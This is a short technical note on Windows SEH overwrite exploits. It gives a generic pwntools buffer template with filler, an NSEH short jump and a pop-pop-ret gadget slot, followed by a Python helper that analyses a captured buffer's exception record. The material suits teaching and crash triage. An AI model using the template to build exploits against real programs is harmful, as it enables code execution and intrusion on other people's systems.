Windows SEH

Exploit Form:

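    from pwn import p32  # pwntools: pack a 32-bit little-endian value

    buffer = b"A"*400                    # filler up to the SEH record
    buffer += p32(0x06eb9090)            # NSEH: nop; nop; jmp short +6, to get over SEH
    buffer += p32(...)                   # SEH: address of a pop pop ret gadget
    buffer += b"\x90"*(600-len(buffer))  # NOP padding up to 600 bytes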

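Overwrite the SEH handler pointer with the address of a pop pop ret gadget, and place a short jump in NSEH to get over the SEH pointer. The pop pop ret returns into the NSEH field, so the short jump runs next and carries execution past the 4-byte handler pointer.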
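For triage of a captured buffer or crash sample, the layout above can be checked mechanically. The following is an added example, not code from the original page: `decode_short_jump` and `analyze_record` are hypothetical helper names, and `0x41414141` is a placeholder handler value in a constructed sample. It decodes the NSEH field and reports whether the short jump lands past the handler pointer.

```python
import struct

RECORD_SIZE = 8  # x86 EXCEPTION_REGISTRATION_RECORD: Next (NSEH) + Handler (SEH)

def decode_short_jump(nseh: bytes):
    """Return the landing offset, relative to the start of the record, of a
    short jump (EB rel8) in the 4-byte NSEH field, or None if there is none.
    Simplification: only NOP (0x90) bytes may precede the jump."""
    for i in range(3):  # EB needs one operand byte, so it starts at 0..2
        if nseh[i] == 0xEB and all(b == 0x90 for b in nseh[:i]):
            rel8 = struct.unpack_from("b", nseh, i + 1)[0]  # signed displacement
            return i + 2 + rel8  # displacement counts from the byte after the jmp
    return None

def analyze_record(data: bytes, nseh_off: int) -> dict:
    """Describe the 8-byte record at nseh_off inside a captured buffer."""
    if nseh_off < 0 or nseh_off + RECORD_SIZE > len(data):
        raise ValueError("record does not fit inside the buffer")
    nseh = data[nseh_off:nseh_off + 4]
    handler = struct.unpack_from("<I", data, nseh_off + 4)[0]
    landing = decode_short_jump(nseh)
    result = {"nseh": nseh.hex(), "handler": hex(handler),
              "lands_at": None, "clears_handler": False}
    if landing is not None:
        result["lands_at"] = nseh_off + landing
        # The jump only gets over SEH if it lands at or past the end of the
        # record and still inside the data that was written.
        result["clears_handler"] = (landing >= RECORD_SIZE
                                    and nseh_off + landing < len(data))
    return result

# Constructed sample with the page's layout; 0x41414141 is a placeholder
# handler value, not a real gadget address.
SAMPLE = (b"A" * 400 + struct.pack("<I", 0x06EB9090)
          + struct.pack("<I", 0x41414141)).ljust(600, b"\x90")

if __name__ == "__main__":
    print(analyze_record(SAMPLE, 400))
```

With the page's NSEH value the jump lands two bytes past the end of the handler pointer, inside the NOP padding.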
